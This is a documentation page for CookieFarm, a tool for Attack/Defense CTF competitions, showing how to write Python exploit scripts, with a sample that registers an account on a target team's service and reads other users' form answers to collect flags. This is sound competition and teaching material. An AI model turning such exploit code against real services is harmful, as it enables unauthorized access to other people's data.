CookieFarm
Exploits

Creating Exploits

How to create Python exploits compatible with CookieFarm.

Creating Exploits

Generate template

ckc exploit create -n my_exploit

File path: ~/.config/cookiefarm/exploits/my_exploit.py.

Minimal structure

#!/usr/bin/env python3
from cookiefarm import exploit_manager

@exploit_manager
def exploit(ip, port, name_service, flag_ids: list):
    # implement here
    print("")

Function contract

  • ip: target team IP
  • port: target service port
  • name_service: service name
  • flag_ids: data retrieved from configured flag IDs endpoint

Correct output

The exploit can print raw flags (FLAG{...}) if they match server regex_flag.

For internal debugging:

  • keep output minimal
  • avoid unnecessary noisy logs in loop
  • use timeouts for all network operations
  • wrap critical blocks in try/except
  • validate input data (flag_ids may be empty or malformed)
  • fail fast when target is down

Test before full run

ckc exploit test -e my_exploit -n CookieService -t 30 -T 5

More Complex Exploits

#!/usr/bin/env python3

import random
from random import random

import requests
from cookiefarm import exploit_manager

s = requests.Session()


def get_answers(base_url, form, token):
    form_id = form["id"]

    r = requests.get(
        base_url + f"/form/{form_id}/answers",
        headers={"Authorization": "Bearer: " + token},
    )
    print(r.text)
    if r.status_code != 200:
        print(f"Failed to get answers for form {form_id} : {r.text}")
        return

    j = r.json()

    return j


def register(base_url, username, password):
    url = f"{base_url}/register"
    data = {"username": username, "password": password}
    response = requests.post(url, json=data)
    return response.json()


@exploit_manager
def exploit(ip: str, port: int, name: str, flagsIds):
    raw_ids = flagsIds.get(name, {}).get(ip.split(".")[2], [])
    base_url = f"http://{ip}:{port}"

    parsed_ids = []
    for item in raw_ids:
        if isinstance(item, str):
            try:
                import json

                item = json.loads(item)
            except Exception:
                continue
        if isinstance(item, dict) and "form_id" in item:
            parsed_ids.append(item)

    res = register(base_url, "attacker" + str(random()), "password123")

    token = res.get("token")
    if not token:
        return

    for flagId in parsed_ids:
        r = get_answers(base_url, {"id": flagId["form_id"]}, token)
        print(r)

The first things to do is generally create the base_url of the challenge, and prepare the flags_ids for the exploit. In this example, we expect the flag_ids to be a list of JSON strings containing a form_id field.

Then, we can implement the logic of the exploit. In this example, we register a new user and then try to get the answers for each form_id in the flag_ids.

The flag_ids are always different

The structure of the flag_ids is not fixed, it depends on how works the flag IDs endpoint in the A/D. Make sure to adapt the exploit code to match the structure of the flag_ids you are using.

How is this guide?

Exploits Overview

Practical exploit lifecycle in CookieFarm for Attack/Defense competitions.

Running Exploits

Run exploits with `ckc exploit test/run`, including tick/thread tuning and submit mode.

On this page

Creating ExploitsGenerate templateMinimal structureFunction contractCorrect outputRecommended patternsTest before full runMore Complex Exploits